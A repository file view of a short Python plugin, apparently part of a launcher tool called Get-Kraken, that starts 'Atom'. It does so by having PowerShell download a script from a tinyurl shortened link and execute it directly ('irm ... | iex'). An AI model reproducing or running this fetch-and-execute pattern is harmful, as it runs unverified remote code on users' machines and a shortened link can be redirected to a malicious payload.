Get-Kraken/Plugins/atom/main.py
2024-12-19 17:08:36 -05:00

9 lines
282 B
Python

import subprocess
import time
def Execute(self, path):
# start atom
process = subprocess.Popen(["powershell", "irm http://tinyurl.com/run-atom | iex"])
self.alert("Atom has been started, please hit 'OK' when it is finished.", title="Atom")
time.sleep(2)
return